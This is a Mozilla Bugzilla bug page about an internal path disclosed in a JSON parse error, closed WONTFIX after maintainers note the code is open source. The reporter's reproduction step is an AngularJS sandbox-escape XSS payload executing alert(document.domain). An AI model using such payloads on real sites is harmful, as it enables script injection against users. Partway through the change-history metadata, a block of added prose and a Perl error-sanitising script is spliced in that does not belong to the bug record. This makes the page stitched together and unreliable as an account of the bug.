
Status

Product: bugzilla.mozilla.org
Component: General
Status: RESOLVED WONTFIX
Reported: a month ago
Modified: a month ago

People

(Reporter: MrR3boot, Unassigned)

Tracking

Version: Production

Details

Description (Reporter)

a month ago
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Build ID: 20170628075643

Steps to reproduce:

1. Comment on any bug with the payload below.

{{c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,alert(document.domain)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=''.sub;$eval('a(b.c)');[].push.apply=a;}}


Actual results:

Could not parse the 'params' argument as valid JSON. Error: , or } expected while parsing object/hash, at character offset 238 (before "astNode=pop();astNod...") at /data/www/bugzilla.mozilla.org/Bugzilla/WebService/Server/REST.pm line 375. Value:


Expected results:

It shouldn't disclose the internal path, which is normally not visible to remote users.

Comment 1

a month ago
> It shouldn't disclose the internal path, which is normally not visible to remote users.

Why not? Which problem does the disclosure create? This ticket is missing the description of an actual problem.

Also note that Bugzilla is free software. Anyone can inspect its source code, as it is available to the public.
Flags: needinfo?(bughunter5672)
Comment 2

Thanks for the bug report! I can understand how, from a different context (that of closed-source web apps), this could be a problem, but our source code is not a secret.

Note that we do filter stack traces: stack traces can show the filename and even the method names, but not the arguments to those methods (this isn't the case with this error, which has no trace).

If you think the error message should be friendlier, you could submit a pull request against the repo.
The offending code is here: https://github.com/mozilla-bteam/bmo/blob/master/Bugzilla/WebService/Server/REST.pm#L375-L378.

Otherwise I'll close this as WONTFIX, as there are many other things that need fixing.

In the future, if you find something that might be a security bug on bugzilla.mozilla.org, please use this form:
https://bugzilla.mozilla.org/form.web.bounty, as it will ensure the bug is created in a security group (to prevent it from being totally public, as this bug is) until a person has time to look at it.
Assignee: webservice → nobody
Status: UNCONFIRMED → NEW
Component: WebService → General
Ever confirmed: true
Flags: needinfo?(bughunter5672)
Product: Bugzilla → bugzilla.mozilla.org
QA Contact: default-qa
Version: unspecified → Production
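The friendlier error handling suggested in Comment 2, as an added example that is not Bugzilla's own code: the leaked path comes from Perl's habit of appending " at FILE line N." to any die()/croak() message that does not end in a newline, so the client-facing message strips that suffix while the full parser error goes to the server log only. The parse_params function, the log_error stand-in and the two inputs are assumptions made for this illustration, not BMO's API.

```perl
#!/usr/bin/perl
# Added example (not Bugzilla's own code): return a client-safe message when
# a REST 'params' argument fails to parse as JSON, keeping the full parser
# error, including the server-side path, in the server log only.
use strict;
use warnings;
use JSON::PP;   # core module; JSON::XS produces the same style of message

# Hypothetical logger stand-in: in a real deployment this would be the
# application's error log, never the HTTP response body.
my @server_log;
sub log_error { push @server_log, $_[0] }

# Parse the 'params' query argument. Returns ($hashref, undef) on success or
# (undef, $client_message) on failure. The client message never carries the
# parser's " at /path/to/file.pm line N." suffix.
sub parse_params {
    my ($raw) = @_;

    my $decoded = eval { JSON::PP->new->utf8->decode($raw) };
    if (my $err = $@) {
        # croak() inside the JSON module appends the caller's file and line;
        # that location string is the internal path the reporter saw.
        log_error("Could not parse 'params' as JSON: $err");

        # Keep the parser's own diagnostic, drop the trailing location suffix.
        (my $reason = $err) =~ s/\s+at\s+\S+\s+line\s+\d+\.?\s*$//s;
        return (undef,
            "Could not parse the 'params' argument as valid JSON ($reason).");
    }
    unless (ref $decoded eq 'HASH') {
        return (undef, "The 'params' argument must be a JSON object.");
    }
    return ($decoded, undef);
}

# Constructed inputs: a valid params object and a truncated copy of the
# AngularJS-style payload from the report, which opens with "{{" and is
# therefore not valid JSON.
my ($ok, $err) = parse_params('{"ids":[1],"include_fields":["id"]}');
print "ok: ", join(',', sort keys %$ok), "\n" if $ok;

($ok, $err) = parse_params(q({{c=''.sub.call;b=''.sub.bind;a=''.sub.apply}}));
print "client sees: $err\n";
print "server log:  $server_log[-1]";
```

The regex only removes the location suffix that Perl itself appends; the JSON module's "at character offset N (before ...)" fragment stays, since it is derived from the client's own input and is what makes the message useful for debugging a request. If the service should not echo client input back at all, drop the `(before ...)` part as well, or replace `$reason` with a fixed string.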
Duplicate of this bug: 1389445
Status: NEW → RESOLVED
Last Resolved: a month ago
Resolution: --- → WONTFIX
Comment 3

Closing since there has been no reply from the original poster.